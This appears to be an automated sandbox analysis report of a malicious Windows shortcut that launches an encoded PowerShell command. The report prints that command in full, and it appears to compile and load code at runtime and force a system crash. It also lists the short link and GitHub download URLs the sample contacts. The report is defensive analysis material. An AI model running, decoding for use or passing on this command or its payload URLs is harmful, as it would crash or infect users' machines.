hkauwb0ahiazqbhag0akabjackakqb1ahmaaqbuagcakab2ageacgagahkapqbuaguadwagaemacgb5ahaadabvafmadabyaguayqbtacgabqasagqalabdahiaeqbwahqabwbtahqacgblageabqbnag8azablac4augblageazaapackadqbzagkabgbnacgadgbhahiaiabzad0abgblahcaiabtahqacgblageabqbsaguayqbkaguacgaoahkakqapahsacgblahqadqbyag4aiabzac4augblageazabuag8arqbuagqakaapadsafqb9ah0afqanadsajabjad0atgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4aqwbvagqazqbeag8abqauaemabwbtahaaaqbsaguacgauaemabwbtahaaaqbsaguacgbqageacgbhag0azqb0aguacgbzadsajabjac4aqwbvag0acabpagwazqbyae8acab0agkabwbuahmapqanac8adqbuahmayqbmaguajwa7acqayqa9aeeazabkac0avab5ahaazqagac0avab5ahaazqbeaguazgbpag4aaqb0agkabwbuacaajabzacaalqbmage
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e jabzad0ajwb1ahmaaqbuagcaiabtahkacwb0aguabqa7ahuacwbpag4azwagafmaeqbzahqazqbtac4avablahgadaa7ahuacwbpag4azwagafmaeqbzahqazqbtac4auwblagmadqbyagkadab5ac4aqwbyahkacab0ag8azwbyageacaboahkaowb1ahmaaqbuagcaiabtahkacwb0aguabqauafiadqbuahqaaqbtagualgbjag4adablahiabwbwafmazqbyahyaaqbjaguacwa7ahuacwbpag4azwagafmaeqbzahqazqbtac4asqbpadsacab1agiababpagmaiabjagwayqbzahmaiabyahsawwbeagwababjag0acabvahiadaaoaciabgb0agqababsac4azabsagwaigapaf0acab1agiababpagmaiabzahqayqb0agkaywagaguaeab0aguacgbuacaadqbpag4adaagafiadabsaeeazabqahuacwb0afaacgbpahyaaqbsaguazwblacgaaqbuahqaiabwacwaygbvag8abaagagualabiag8abwbsacaaywasag8adqb0acaaygbvag8abaagag8akqa7afsarabsagwasqbtahaabwbyahqakaaiag4adabkagwabaauagqababsaciakqbdahaadqbiagwaaqbjacaacwb0ageadabpagmaiablahgadablahiabgagahuaaqbuahqaiaboahqaugbhagkacwblaegayqbyagqarqbyahiabwbyacgadqbpag4adaagagualab1agkabgb0acaabgasahuaaqbuahqaiab1acwasqbuahqauab0ahiaiabwacwadqbpag4adaagahyalabvahuadaagahuaaqbuahqaiabyackaowbwahuaygbsagkaywagahmadabhahqaaqbjacaadqbuahmayqbmaguaiabzahqacgbpag4azwagafmaaabvahqakaapahsaygbvag8abaagag8aowb1agkabgb0acaacga7afiadabsaeeazabqahuacwb0afaacgbpahyaaqbsaguazwblacgamqa5acwadabyahuazqasagyayqbsahmazqasag8adqb0acaabwapadsatgb0afiayqbpahmazqbiageacgbkaeuacgbyag8acgaoadaaeabjadaamaawadaamaayadialaawacwamaasaekabgb0afaadabyac4awgblahiabwasadyalabvahuadaagahiakqa7agiaeqb0aguawwbdagmapqbdag8abgb2aguacgb0ac4argbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciaugboag8aoabuafoanqa2afiadgaraeuaeqbaafcanwazae4abwbjaeyatwbjagkatgbgagyataa0aduadabyahcamga0afuabwbnaecazabiagsacwb3aguayqavafcaaabuae4aaabdae4adwbqafeabgaxageavwbqagyadwaiackaowbiahkadablafsaxqbrad0aqwbvag4adgblahiadaauaeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaaiac8ayqaxafkakwbmahmacabxac8atgb3agwaywbqahcacabhafqamwbpahiawqayaggaywbfahkadabrahqadqbiadcatabzafkakwboagwatablahcapqaiackaowbiahkadablafsaxqbpad0aqwbvag4adgblahiadaauaeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaaiadkacwbyaecabqbladqacqa5aewazabzaeyazabpahaanabuafmacwbrahcapqa9aciakqa7ahuacwbpag4azwaoaeeazqbzacaayqa9aeeazqbzac4aqwbyaguayqb0aguakaapackaewbhac4aswblahkapqbradsayqauaekavga9agkaowbjaemacgb5ahaadabvafqacgbhag4acwbmag8acgbtacaazaa9agealgbdahiazqbhahqazqbeaguaywbyahkacab0ag8acgaoagealgblaguaeqasagealgbjafyakqa7ahuacwbpag4azwaoahyayqbyacaabqa9ag4azqb3acaatqblag0abwbyahkauwb0ahiazqbhag0akabjackakqb1ahmaaqbuagcakab2ageacgagahkapqbuaguadwagaemacgb5ahaadabvafmadabyaguayqbtacgabqasagqalabdahiaeqbwahqabwbtahqacgblageabqbnag8azablac4augblageazaapackadqbzagkabgbnacgadgbhahiaiabzad0abgblahcaiabtahqacgblageabqbsaguayqbkaguacgaoahkakqapahsacgblahqadqbyag4aiabzac4augblageazabuag8arqbuagqakaapadsafqb9ah0afqanadsajabjad0atgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4aqwbvagqazqbeag8abqauaemabwbtahaaaqbsaguacgauaemabwbtahaaaqbsaguacgbqageacgbhag0azqb0aguacgbzadsajabjac4aqwbvag0acabpagwazqbyae8acab0agkabwbuahmapqanac8adqbuahmayqbmaguajwa7acqayqa9aeeazabkac0avab5ahaazqagac0avab5ahaazqbeaguazgbpag4aaqb0agkabwbuacaajabzacaalqbmage Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526392 Sample: Windows PowerShell.lnk Startdate: 05/10/2024 Architecture: WINDOWS Score: 100 41 objects.githubusercontent.com 2->41 43 is.gd 2->43 45 github.com 2->45 53 Windows shortcut file (LNK) starts blacklisted processes 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands 2->57 59 6 other signatures 2->59 10 powershell.exe 14 20 2->10         started        signatures3 process4 dnsIp5 47 github.com 140.82.121.4, 443, 49712 GITHUBUS United States 10->47 49 objects.githubusercontent.com 185.199.111.133, 443, 49714 FASTLYUS Netherlands 10->49 51 is.gd 104.25.234.53, 443, 49710, 49711 CLOUDFLARENETUS United States 10->51 37 C:\Users\user\AppData\Local\Temp\.cmd, Unicode 10->37 dropped 63 Windows shortcut file (LNK) starts blacklisted processes 10->63 65 Found suspicious powershell code related to unpacking or dynamic code loading 10->65 15 cmd.exe 1 10->15         started        18 conhost.exe 1 10->18         started        file6 signatures7 process8 signatures9 67 Windows shortcut file (LNK) starts blacklisted processes 15->67 69 Malicious encrypted Powershell command line found 15->69 71 Encrypted powershell cmdline option found 15->71 20 powershell.exe 22 15->20         started        24 cmd.exe 1 15->24         started        26 cmd.exe 1 15->26         started        28 69 other processes 15->28 process10 file11 35 C:\Users\user\AppData\...\pbkjdvqy.cmdline, Unicode 20->35 dropped 61 Performs an instant shutdown (NtRaiseHardError) 20->61 30 csc.exe 3 20->30         started        signatures12 process13 file14 39 C:\Users\user\AppData\Local\...\pbkjdvqy.dll, PE32 30->39 dropped 33 cvtres.exe 1 30->33         started        process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.25.234.53
 is.gd United States
13335 CLOUDFLARENETUS false
140.82.121.4
 github.com United States
36459 GITHUBUS false
185.199.111.133
 objects.githubusercontent.com Netherlands
54113 FASTLYUS false

Contacted Domains

Name IP Active
github.com 140.82.121.4 true
is.gd 104.25.234.53 true
objects.githubusercontent.com 185.199.111.133 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://is.gd/jwr7JD false unknown
https://github.com/user-attachments/files/17251016/powershell.zip false unknown
https://is.gd/jwr7JD false unknown